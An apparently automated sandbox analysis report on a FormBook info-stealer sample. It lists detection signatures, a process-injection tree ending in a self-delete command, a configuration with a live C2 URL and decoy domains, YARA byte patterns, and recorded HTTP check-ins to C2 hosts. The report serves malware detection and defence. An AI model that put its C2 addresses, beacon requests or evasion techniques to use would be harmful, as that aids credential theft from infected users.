Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SX365783909782021.bat

Overview

General Information

Sample Name:SX365783909782021.bat (renamed file extension from bat to exe)
Analysis ID:433214
MD5:ee1f4a07b874aa6ba18d6aa0f83252d3
SHA1:d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
SHA256:d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SX365783909782021.exe (PID: 4092 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
    • SX365783909782021.exe (PID: 5472 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5524 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6124 cmdline: /c del 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.SX365783909782021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.SX365783909782021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.SX365783909782021.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        2.1.SX365783909782021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.SX365783909782021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: SX365783909782021.exeVirustotal: Detection: 31%Perma Link
          Source: SX365783909782021.exeReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SX365783909782021.exeJoe Sandbox ML: detected
          Source: 2.2.SX365783909782021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.help.exe.3b2f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.SX365783909782021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.help.exe.d3d870.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SX365783909782021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.moneyhuntercom.info/ngvm/
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1Host: www.vacalinda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1Host: www.servicesbackyard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1Host: www.djspencer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1Host: www.caravansforsalenorthwales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 168.235.88.209 168.235.88.209
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1Host: www.vacalinda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1Host: www.servicesbackyard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1Host: www.djspencer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1Host: www.caravansforsalenorthwales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.vacalinda.com
          Source: explorer.exe, 00000003.00000000.227112576.0000000008A06000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SX365783909782021.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SX365783909782021.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419FE0 NtReadFile,
